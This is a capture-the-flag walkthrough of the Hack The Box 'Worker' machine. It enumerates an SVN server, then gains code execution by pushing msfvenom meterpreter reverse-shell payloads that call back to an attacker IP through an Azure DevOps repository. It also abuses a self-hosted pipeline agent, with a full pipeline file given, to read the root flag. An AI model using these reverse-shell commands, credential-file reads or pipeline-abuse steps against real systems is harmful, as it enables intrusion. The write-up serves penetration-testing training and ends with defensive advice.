```
# Nmap 7.80 scan initiated Tue Oct 20 20:33:43 2020 as: nmap -sSVC -p- -oA nmap_full -v 10.10.10.203
Nmap scan report for 10.10.10.203
Host is up (0.023s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 20 20:35:39 2020 -- 1 IP address (1 host up) scanned in 115.81 seconds
```
On port 3690 we have an SVN server; 3690 is the default port of the svnserve service.
svnserve allows access to Subversion repositories using Subversion's custom network protocol.
You can run svnserve as a standalone server process (for clients that are using the svn:// access method); you can have a daemon such as inetd or xinetd launch it for you on demand (also for svn://), or you can have sshd launch it on demand for the svn+ssh:// access method.
So let's find some information:
```
$ svn info svn://worker.htb
Path: .
URL: svn://worker.htb
Relative URL: ^/
Repository Root: svn://worker.htb
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 5
Last Changed Date: 2020-06-20 15:52:00 +0200 (Sat, 20 Jun 2020)
```

```
$ mkdir svn && cd svn && svn export --force svn://worker.htb
A    .
A    dimension.worker.htb
A    dimension.worker.htb/LICENSE.txt
A    dimension.worker.htb/README.txt
A    dimension.worker.htb/assets
A    dimension.worker.htb/assets/css
A    dimension.worker.htb/assets/css/fontawesome-all.min.css
A    dimension.worker.htb/assets/css/main.css
A    dimension.worker.htb/assets/css/noscript.css
A    dimension.worker.htb/assets/js
A    dimension.worker.htb/assets/js/breakpoints.min.js
A    dimension.worker.htb/assets/js/browser.min.js
A    dimension.worker.htb/assets/js/jquery.min.js
A    dimension.worker.htb/assets/js/main.js
A    dimension.worker.htb/assets/js/util.js
A    dimension.worker.htb/assets/sass
A    dimension.worker.htb/assets/sass/base
A    dimension.worker.htb/assets/sass/base/_page.scss
A    dimension.worker.htb/assets/sass/base/_reset.scss
A    dimension.worker.htb/assets/sass/base/_typography.scss
A    dimension.worker.htb/assets/sass/components
A    dimension.worker.htb/assets/sass/components/_actions.scss
A    dimension.worker.htb/assets/sass/components/_box.scss
A    dimension.worker.htb/assets/sass/components/_button.scss
A    dimension.worker.htb/assets/sass/components/_form.scss
A    dimension.worker.htb/assets/sass/components/_icon.scss
A    dimension.worker.htb/assets/sass/components/_icons.scss
A    dimension.worker.htb/assets/sass/components/_image.scss
A    dimension.worker.htb/assets/sass/components/_list.scss
A    dimension.worker.htb/assets/sass/components/_table.scss
A    dimension.worker.htb/assets/sass/layout
A    dimension.worker.htb/assets/sass/layout/_bg.scss
A    dimension.worker.htb/assets/sass/layout/_footer.scss
A    dimension.worker.htb/assets/sass/layout/_header.scss
A    dimension.worker.htb/assets/sass/layout/_main.scss
A    dimension.worker.htb/assets/sass/layout/_wrapper.scss
A    dimension.worker.htb/assets/sass/libs
A    dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A    dimension.worker.htb/assets/sass/libs/_functions.scss
A    dimension.worker.htb/assets/sass/libs/_mixins.scss
A    dimension.worker.htb/assets/sass/libs/_vars.scss
A    dimension.worker.htb/assets/sass/libs/_vendor.scss
A    dimension.worker.htb/assets/sass/main.scss
A    dimension.worker.htb/assets/sass/noscript.scss
A    dimension.worker.htb/assets/webfonts
A    dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A    dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A    dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A    dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A    dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A    dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A    dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A    dimension.worker.htb/images
A    dimension.worker.htb/images/bg.jpg
A    dimension.worker.htb/images/overlay.png
A    dimension.worker.htb/images/pic01.jpg
A    dimension.worker.htb/images/pic02.jpg
A    dimension.worker.htb/images/pic03.jpg
A    dimension.worker.htb/index.html
A    moved.txt
Exported revision 5.
```
Let's look at `moved.txt` first, which is explicit:

```
$ cat moved.txt
This repository has been migrated and will no longer be maintained here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)
```
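`svn export` only retrieves HEAD (revision 5 here), but the repository has history, and anything committed and later deleted is invisible in the exported tree. The script below is an added example, not part of the original write-up: it parses the output of `svn log --xml --verbose svn://worker.htb`, reports every path that no longer exists in HEAD together with the revisions in which it did, and builds the `svn cat` commands to pull each historical version. The XML embedded in it is a constructed sample log (the file names, authors and messages are invented for illustration), not the real repository's log.

```python
# Added example: find files that survive only in Subversion history.
# Input is `svn log --xml --verbose <repo-url>`; SAMPLE_LOG below is a
# constructed stand-in for that output, not the real worker.htb log.
import xml.etree.ElementTree as ET

SAMPLE_LOG = """<?xml version="1.0" encoding="UTF-8"?>
<log>
<logentry revision="1"><author>nathen</author><paths>
<path action="A" kind="dir">/dimension.worker.htb</path>
<path action="A" kind="file">/dimension.worker.htb/index.html</path>
<path action="A" kind="file">/robots.txt</path>
</paths><msg>import site</msg></logentry>
<logentry revision="2"><author>nathen</author><paths>
<path action="A" kind="file">/scripts/publish.ps1</path>
</paths><msg>add publish script</msg></logentry>
<logentry revision="3"><author>nathen</author><paths>
<path action="M" kind="file">/scripts/publish.ps1</path>
<path action="D" kind="file">/robots.txt</path>
</paths><msg>move credentials out of the script</msg></logentry>
<logentry revision="4"><author>nathen</author><paths>
<path action="D" kind="file">/scripts/publish.ps1</path>
</paths><msg>publishing moved elsewhere</msg></logentry>
<logentry revision="5"><author>nathen</author><paths>
<path action="A" kind="file">/robots.txt</path>
<path action="A" kind="file">/moved.txt</path>
</paths><msg>repository migrated</msg></logentry>
</log>
"""


def parse_log(xml_text):
    """Return [(revision, [(action, path), ...]), ...] in ascending revision order."""
    root = ET.fromstring(xml_text)
    entries = []
    for entry in root.findall("logentry"):
        rev = int(entry.get("revision"))
        changes = [(p.get("action"), p.text) for p in entry.findall("paths/path")]
        entries.append((rev, changes))
    return sorted(entries)


def history_only_files(xml_text):
    """Map each path that is gone from HEAD to the last revision where it
    existed and to every revision that wrote it (each may hold a different
    version, e.g. one with a secret that a later commit scrubbed).

    A path that is deleted and later re-added is present in HEAD and is
    therefore not reported. Limitation: deleting a directory shows up in the
    log as a single 'D' on the directory, so its children are not listed
    individually; check the directory itself in that case."""
    versions = {}   # path -> revisions that added/modified/replaced it
    gone = {}       # path -> last revision in which it still existed
    for rev, changes in parse_log(xml_text):
        for action, path in changes:
            if action in ("A", "M", "R"):
                versions.setdefault(path, []).append(rev)
                gone.pop(path, None)        # re-added: back in HEAD
            elif action == "D" and path in versions:
                gone[path] = rev - 1
    return {p: {"last_rev": r, "versions": versions[p]} for p, r in gone.items()}


def recovery_commands(xml_text, repo_url):
    """Build one `svn cat` per historical version, using peg revisions so the
    path is resolved as it existed at that revision."""
    cmds = []
    for path, info in sorted(history_only_files(xml_text).items()):
        for rev in info["versions"]:
            cmds.append(f"svn cat -r {rev} {repo_url}{path}@{rev}")
    return cmds


if __name__ == "__main__":
    for cmd in recovery_commands(SAMPLE_LOG, "svn://worker.htb"):
        print(cmd)
```

Against a live server, replace `SAMPLE_LOG` with the file produced by `svn log --xml --verbose svn://worker.htb > log.xml`; anonymous read access, the svnserve default, is enough to walk the full history, which is why a "migrated" repository left reachable is still worth more than its HEAD.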
In the other repository, on devops.worker.htb, we find a showcase website listing some
projects, which gives us new sub-domains:
All those domains host a web application deployed straight from its repository, and we
control the source, so we will be able to push a reverse shell to the master branch and
reach it via the web application.
First, let's generate an ASPX reverse shell:
```
$ msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows --encoder generic/none LHOST=10.10.14.174 LPORT=9999 -f aspx > noraj.aspx
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 510 (iteration=0)
generic/none chosen with final size 510
Payload size: 510 bytes
Final size of aspx file: 3663 bytes
```
Here are a few steps I won't detail too much:

1. Select a project, e.g. Alpha
2. Create a new branch
3. Upload the reverse shell to the branch (e.g. in the assets folder)
4. Create a PR
5. Satisfy the merge policies: approve and link a work item
```
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.174     yes       The listen address (an interface may be specified)
   LPORT     9999             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.174:9999
[*] Sending stage (201283 bytes) to 10.10.10.203
[*] Meterpreter session 1 opened (10.10.14.174:9999 -> 10.10.10.203:55557) at 2020-10-21 20:33:24 +0200
```
## Elevation of Privilege (EoP): from iis apppool\defaultapppool to robisl
```
meterpreter > shell
Process 8920 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>cat w:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
```
This time there is no PartsUnlimited sub-domain; there are a lot of files in
the repository but nothing seems useful.
As an everyday user of GitLab I know I can run some tests in a Docker container thanks
to the integrated GitLab CI pipeline (no need to configure an external CI) that
you can configure through .gitlab-ci.yml.
It seems Azure Devops has a similar feature: New Pipeline > Azure Repos Git > PartsUnlimited > Starter Pipeline > azure-pipelines.yml.
We are welcomed with a default template:
```yaml
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

pool: 'Default'

steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'

- script: |
    echo Add other tasks to build, test, and deploy your project.
    echo See https://aka.ms/yaml
  displayName: 'Run a multi-line script'
```
Let's create a new reverse shell (an exe this time).
```
$ msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows --encoder generic/none LHOST=10.10.14.174 LPORT=9999 -f raw > noraj.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 510 (iteration=0)
generic/none chosen with final size 510
Payload size: 510 bytes
```
```
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.174     yes       The listen address (an interface may be specified)
   LPORT     9999             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
```
[evil-winrm](https://github.com/Hackplayers/evil-winrm) allows us to upload a file:

```
*Evil-WinRM* PS C:\Users\robisl\Downloads> upload /home/noraj/CTF/HackTheBox/machines/Worker/noraj.exe
Info: Uploading /home/noraj/CTF/HackTheBox/machines/Worker/noraj.exe to C:\Users\robisl\Downloads\noraj.exe

Data: 680 bytes of 680 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\robisl\Downloads> pwd

Path
----
C:\Users\robisl\Downloads
```
Now modify the template pipeline to:

```yaml
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
```

So I changed my template to the following and created a new pipeline:

```yaml
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
```
Here is the execution of the pipeline task "noraj":
```
##[section]Starting: noraj
==============================================================================
Task         : Command line
Description  : Run a command line script using Bash on Linux and macOS and cmd.exe on Windows
Version      : 2.151.1
Author       : Microsoft Corporation
Help         : https://docs.microsoft.com/azure/devops/pipelines/tasks/utility/command-line
==============================================================================
Generating script.
Script contents:
C:\Users\robisl\Downloads\noraj.exe
========================== Starting Command Output ===========================
##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\31fb30ee-8d29-41e3-9ab0-529b331cef0e.cmd""
##[error]This version of C:\Users\robisl\Downloads\noraj.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.
##[error]Cmd.exe exited with code '1'.
##[section]Finishing: noraj
```
Seems to be the wrong architecture.
So I created a 32-bit reverse shell instead of a 64-bit one:
```
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows --encoder generic/none LHOST=10.10.14.174 LPORT=9999 -f raw > noraj.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 341 (iteration=0)
generic/none chosen with final size 341
Payload size: 341 bytes
```
Same error again, ok let's forget the shell, let's just display the root
flag.
```
##[section]Starting: noraj
==============================================================================
Task         : Command line
Description  : Run a command line script using Bash on Linux and macOS and cmd.exe on Windows
Version      : 2.151.1
Author       : Microsoft Corporation
Help         : https://docs.microsoft.com/azure/devops/pipelines/tasks/utility/command-line
==============================================================================
Generating script.
Script contents:
type C:\Users\Administrator\Desktop\root.txt
========================== Starting Command Output ===========================
##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\d9359887-a4ac-49ad-9865-3e9b9024f109.cmd""
c8d6aeda24c4e17abcc72f26dedbe919
##[section]Finishing: noraj
```
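The author's modified pipelines are truncated above, so here is an added example of the complete `azure-pipelines.yml` that produces the kind of job log shown; it is written for this page and is not the author's own file. It assumes the same self-hosted `Default` pool (the agent under `w:\agents\agent11`) and the Command line task the logs show; the step names and the `whoami` step are illustrative.

```yaml
# Added example (not the author's pipeline): run arbitrary commands on the
# self-hosted agent from a pipeline created through the Azure DevOps UI.
trigger:
- master

# 'Default' is the self-hosted pool, so the job lands on w:\agents\agent11
# and runs under the agent's service account, not in a throwaway hosted VM.
pool: 'Default'

steps:
# Find out whose privileges the agent actually has before doing anything else.
- script: |
    whoami /all
    hostname
  displayName: 'noraj'

# Launching an uploaded binary. The Command line task runs this through
# cmd.exe, so the file must be a real PE: msfvenom -f raw (as used above)
# emits bare shellcode, which Windows rejects as "not compatible with the
# version of Windows you're running"; build it with -f exe instead.
- script: C:\Users\robisl\Downloads\noraj.exe
  displayName: 'run uploaded binary'
  continueOnError: true

# No callback is needed at all: whatever the step prints is streamed back
# into the job log, which is how the flag was read in the run above.
- script: type C:\Users\Administrator\Desktop\root.txt
  displayName: 'read flag'
```

The `-f raw` detail also explains the upload sizes above: the 510-byte payload arrives as 680 bytes of base64, far too small to be an executable. From a defensive standpoint the weakness is not the YAML but the setup it exploits: anyone allowed to create a pipeline that can target the `Default` pool executes code as the agent account, so that account should be low-privilege, and permission to use a self-hosted pool should be restricted at the pool and project level rather than left open to every contributor.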